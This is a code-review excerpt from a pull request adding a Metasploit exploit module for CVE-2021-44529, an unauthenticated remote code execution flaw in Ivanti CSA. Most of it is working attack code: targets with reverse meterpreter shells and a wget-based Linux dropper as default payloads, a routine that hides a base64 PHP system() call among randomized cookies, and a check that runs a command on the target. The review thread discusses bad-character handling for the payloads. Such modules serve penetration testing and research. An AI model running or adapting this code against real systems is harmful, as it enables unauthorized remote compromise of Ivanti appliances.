modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb

```diff
@@ -0,0 +1,175 @@
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http'
+              }
+            }
+          ],
+          [
+            'PHP Command',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_http'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def randomize_cookie(payload)
+    # randomize the cookie in terms cookie pairs "name=value"
+    # Number of cookie pairss should be at least 4, and the first cookie pair should be always name='ab'
+    # and the cookie number matching  no_of_cookies-2 should contain the payload
+    # example 1: Cookie: sG34st=ab;g3sBdnn=<PAYLOAD>;h4hYyeEe=;j7sJJjjs=;
+    # example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=<PAYLOAD>;uEn44Nkk=;nnXk=;
+    no_of_cookies = rand(4..8)
+    cookie_name = Rex::Text.rand_text_alphanumeric(1..8)
+    random_cookie = "#{cookie_name}=ab;"
+    for cookie_no in 2..no_of_cookies do
+      cookie_name = Rex::Text.rand_text_alphanumeric(1..8)
+      if cookie_no == no_of_cookies - 2
+        random_cookie << "#{cookie_name}=#{payload};"
+      else
+        random_cookie << "#{cookie_name}=;"
+      end
+    end
+    # print_status("cookie: #{random_cookie}")
+    return random_cookie
+  end
+
+  def check_vuln
+    # check RCE by grabbing CSA version banner stored on /etc/LDBUILD
+    payload = Base64.strict_encode64('system("cat /etc/LDBUILD");')
+    cookie_payload = randomize_cookie(payload)
+
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),
+      'cookie' => cookie_payload.to_s
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    case target['Type']
+    when :unix_cmd
+      payload = Base64.strict_encode64("system(\"#{cmd}\");")
```

Comment:
None of these payloads seem to have defined the `"` character as a bad character. May be a good idea to add this to the blocklist of characters that your payloads shouldn't be using given what your doing here.

Reply:
Yeah, good learning point. Never used bad characters definition in my modules. Will apply this from now one when applicable.

Reply:
Fixed in 57b38a879d9233b5a7817c9f55094fa3425adc46